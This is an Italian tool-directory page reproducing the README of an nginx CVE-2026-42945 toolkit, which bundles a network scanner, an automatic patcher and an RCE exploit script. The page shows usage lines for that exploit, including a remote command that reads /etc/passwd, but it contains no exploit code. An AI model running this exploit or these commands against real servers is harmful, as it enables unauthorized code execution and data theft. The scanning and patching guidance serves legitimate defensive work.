Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42945-NGINX-Rift-Toolkit — CVE-2026-42945 - NGINX Rift Toolkit | Kitploit
Strumenti/GitHubGitHub/gagaltotal/cve-2026-42945-nginx-rift-toolkit
Scanner di VulnerabilitàMappatura della ReteExploitAudit di ConfigurazioneSicurezza WebPenetration Testing
GitHubgagaltotal/cve-2026-42945-nginx-rift-toolkit

CVE-2026-42945-NGINX-Rift-Toolkit

CVE-2026-42945 - NGINX Rift Toolkit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web
413 mesi faNon ancora revisionato

CVE-2026-42945 Toolkit per la Vulnerabilità Nginx Rift

CVSS Score: 9.8 - Critical Python Version License

Toolkit completo per la scansione, la correzione e il test di CVE-2026-42945 - una vulnerabilità RCE critica in nginx

Indice dei Contenuti

  • Panoramica
  • Dettagli CVE
  • Caratteristiche
  • Componenti del Toolkit
  • Requisiti
  • Installazione
  • Utilizzo
  • Esempi di Flusso di Lavoro
  • Considerazioni sulla Sicurezza
  • Risoluzione dei Problemi
  • Contributi

Panoramica

Questo toolkit fornisce strumenti completi per la scansione, la correzione e il test di CVE-2026-42945, una vulnerabilità critica di esecuzione remota di codice in nginx che interessa le versioni precedenti alla 1.26.3 (mainline) e alla 1.24.1 (stable).

La vulnerabilità sfrutta la gestione impropria delle intestazioni HTTP/2 quando ASLR è disabilitato utilizzando tecniche di heap spray.

Dettagli CVE

Caratteristiche

  • Scansione di Rete - Scansione di sottoreti CIDR con rilevamento concorrente degli host
  • Rilevamento della Versione - Identificazione della versione di nginx multi-distribuzione tramite SSH
  • Correzione Automatica - Correzione in batch delle istanze vulnerabili attraverso la rete
  • Test di Sfruttamento - Verifica della vulnerabilità con tecniche di heap spray
  • Generazione di Report - Report in formato HTML e JSON
  • Modalità Dry-Run - Anteprima delle modifiche prima dell'applicazione
  • Autenticazione Multipla - Autenticazione tramite chiave SSH e password
  • Registrazione di Audit - Registri dettagliati delle operazioni con timestamp

Componenti del Toolkit

1. nginx_scanner.py - Scanner di Vulnerabilità

Scansiona una sottorete o un singolo host per identificare installazioni vulnerabili di nginx.

Caratteristiche:

  • Supporto per la scansione di sottoreti CIDR
  • Rilevamento concorrente degli host e identificazione della versione
  • Verifica remota della versione tramite SSH
  • Supporto multi-distribuzione (Ubuntu, Debian, CentOS, AlmaLinux, RHEL)
  • Generazione di report in HTML e JSON
  • Porte SSH e metodi di autenticazione personalizzabili

2. nginx_patcher.py - Automazione della Correzione

Applica automaticamente le correzioni alle istanze vulnerabili di nginx all'ultima versione sicura.

Caratteristiche:

  • Correzione in batch su intervalli di sottoreti
  • Comandi di correzione specifici per distribuzione
  • Modalità dry-run per la validazione della sicurezza
  • Specifica della versione target
  • Registri dettagliati dell'esecuzione delle correzioni
  • Monitoraggio dei progressi e generazione di report

3. exploit.py - Exploit per Esecuzione Remota di Codice

Testa la vulnerabilità CVE-2026-42945 tramite la tecnica dell'heap spray.

Caratteristiche:

  • Prende di mira istanze nginx con ASLR disabilitato
  • Sfruttamento tramite buffer overflow con heap spray
  • Supporto di multipli offset per maggiore affidabilità
  • Capacità di esecuzione di comandi remoti
  • Meccanismi di timeout e retry della connessione
  • Statistiche dettagliate di esecuzione

Distribuzioni Supportate

  • Ubuntu (tutte le versioni con nginx)
  • Debian (tutte le versioni con nginx)
  • CentOS 7+
  • AlmaLinux
  • RHEL (Red Hat Enterprise Linux)

Requisiti

  • Python: 3.7 o superiore
  • Sistema Operativo: Ambiente Linux/Unix

Dipendenze

root@kitploit:~
paramiko (>= 3.0.0) - SSH client library
rich (>= 13.0.0) - Terminal formatting and progress bars

Installazione

Passo 1: Clona o Scarica

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-42945-NGINX-Rift-Toolkit
cd CVE-2026-42945-NGINX-Rift-Toolkit

Passo 2: Crea un Ambiente Virtuale

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate

Passo 3: Installa le Dipendenze

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Screen Capture

Scanner (nginx_scanner.py)

Scansione di Base di una Sottorete

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Scansione di un Singolo Host

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.10 --user root --key ~/.ssh/id_rsa

Autenticazione Basata su Password

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/30 --user admin --password "password"

Porta SSH Personalizzata

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --port 2222 --user root --key ~/.ssh/id_rsa

Genera Report HTML

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --output report.html

Opzioni dello Scanner

root@kitploit:~
--subnet SUBNET              Sottorete target in formato CIDR (obbligatorio)
--user USER                  Nome utente SSH (default: root)
--password PASSWORD          Password SSH
--key KEY_PATH               Percorso della chiave privata SSH
--port PORT                  Porta SSH (default: 22)
--timeout TIMEOUT            Timeout di connessione in secondi (default: 5)
--output FILE                File del report di output (HTML/JSON)
--workers WORKERS            Numero di thread concorrenti (default: 20)

Patcher (nginx_patcher.py)

Screen Capture

Correzione di Base

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Dry-Run (Anteprima senza Applicare)

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

Versione Specifica Target

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --target-version 1.26.3 --user root --key ~/.ssh/id_rsa

Porta SSH Personalizzata

root@kitploit:~
python3 nginx_patcher.py --subnet 10.0.0.0/30 --port 2222 --user admin --password "password"

Opzioni del Patcher

root@kitploit:~
--subnet SUBNET              Sottorete target in formato CIDR (obbligatorio)
--user USER                  Nome utente SSH (default: root)
--password PASSWORD          Password SSH
--key KEY_PATH               Percorso della chiave privata SSH
--port PORT                  Porta SSH (default: 22)
--timeout TIMEOUT            Timeout di connessione in secondi (default: 30)
--target-version VERSION     Versione di nginx a cui applicare la patch (default: latest)
--dry-run                    Mostra cosa verrebbe corretto senza eseguire
--workers WORKERS            Numero di thread concorrenti (default: 10)

Exploit (exploit.py)

Screen Capture

Sfrutta un Singolo Target

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80

Con Payload Personalizzato

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --command "cat /etc/passwd"

Tentativi Multipli di Spray

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --spray 50

Output Dettagliato

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --verbose

Opzioni dell'Exploit

root@kitploit:~
--target HOST               IP o dominio del target (obbligatorio)
--port PORT                 Porta target (default: 80)
--command CMD               Comando da eseguire
--spray NUM                 Numero di tentativi di heap spray (default: 20)
--timeout TIMEOUT           Timeout di connessione in secondi (default: 5)
--tries NUM                 Numero di tentativi di sfruttamento (default: 10)
--verbose                   Abilita output dettagliato

Esempi di Flusso di Lavoro

Scenario 1: Valutazione Completa della Sicurezza

root@kitploit:~
# Step 1: Scan network for vulnerable instances
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key --output scan_results.html

# Step 2: Review scan results in scan_results.html

# Step 3: Patch vulnerable instances
python3 nginx_patcher.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key

# Step 4: Verify patches applied by running scanner again
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key

Scenario 2: Correzione di Emergenza

root@kitploit:~
# Step 1: Dry-run to see what would be patched
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

# Step 2: Apply patches
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Scenario 3: Test su un Sistema Vulnerabile

root@kitploit:~
# Step 1: First verify the system is vulnerable
python3 exploit.py --target 10.0.0.50 --port 80 --verbose

# Step 2: If successful, immediate patching is recommended
python3 nginx_patcher.py --subnet 10.0.0.50 --user root --key ~/.ssh/id_rsa

Considerazioni sulla Sicurezza

Metodi di Autenticazione

Basato su Chiave SSH (Raccomandato)

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --key ~/.ssh/id_rsa

Basato su Password

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --password "password"

Porta SSH Personalizzata

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --key ~/.ssh/id_rsa --port 2222

Risoluzione dei Problemi

Problemi di Connessione SSH

  • Permessi della chiave SSH: chmod 600 ~/.ssh/id_rsa
  • Servizio SSH: Verifica che il servizio SSH sia in esecuzione sul target
  • Porta SSH: Controlla che la porta SSH sia corretta (default: 22)
  • Firewall: Assicurati che il firewall permetta le connessioni SSH

Rilevamento della Versione Fallisce

  • Nginx installato: Conferma che nginx sia installato sul target
  • Privilegi: Verifica che l'utente abbia privilegi sudo o accesso diretto come root
  • Rete: Controlla la connettività di rete con gli host target

Errori di Patch

  • Test dry-run: Usa --dry-run per identificare i problemi senza applicare
  • Internet: Assicurati che i sistemi target abbiano connettività internet per il download dei pacchetti
  • Gestore pacchetti: Verifica che il gestore pacchetti funzioni sui target
  • Spazio su disco: Controlla lo spazio su disco sui sistemi target

Report di Output

Lo scanner genera report dettagliati in diversi formati:

FormatoDescrizione
Report HTMLVisibile nel browser con riepilogo delle vulnerabilità, host interessati, dettagli delle versioni
Report JSONFormato leggibile dalla macchina con dettagli tecnici completi
Output ConsoleProgresso in tempo reale con risultati colorati

Registrazione

Tutte le operazioni vengono registrate con timestamp per conformità di audit. Controlla l'output della console per informazioni dettagliate sull'esecuzione.

Contributi

I contributi sono benvenuti! Per contribuire:

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità (git checkout -b feature/miglioramento)
  3. Esegui il commit delle tue modifiche (git commit -am 'Aggiungi miglioramento')
  4. Pusha sul branch (git push origin feature/miglioramento)
  5. Apri una Pull Request

Disclaimer

Questo toolkit è fornito esclusivamente per test di sicurezza autorizzati e valutazione delle vulnerabilità. L'accesso non autorizzato a sistemi informatici è illegale. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di utilizzare questo toolkit.

Autore

gagaltotal - GitHub

Licenza

Questo progetto è concesso in licenza con la Licenza MIT - consulta il file LICENSE per i dettagli.


Ultimo aggiornamento: 2026-05-20

Scarica lo strumento
ProprietàValore
ID VulnerabilitàCVE-2026-42945
TipoEsecuzione Remota di Codice (RCE)
Punteggio CVSS9.8 (Critico)
Versioni Affette< 1.26.3 (mainline) / < 1.24.1 (stable)
Versione Corretta1.26.3+
Vettore d'AttaccoAnalisi non corretta delle intestazioni HTTP/2
PrerequisitoASLR disabilitato sul sistema target
ConsiderazioneDettagli
Gestione delle Chiavi SSHConserva le chiavi SSH in modo sicuro, non impegnarle mai nei repository
Accesso alla ReteAssicura una corretta segmentazione della rete per l'uso in produzione
Ambiente di TestTesta sempre prima in un ambiente non di produzione
RegistrazioneTutte le operazioni generano registri dettagliati per la tracciabilità
Stato di ASLRLo strumento exploit richiede che ASLR sia disabilitato sul target
Modalità Dry-runUtilizza il flag --dry-run per visualizzare in anteprima le modifiche prima di applicarle
BackupEsegui sempre il backup della configurazione di nginx prima di applicare le patch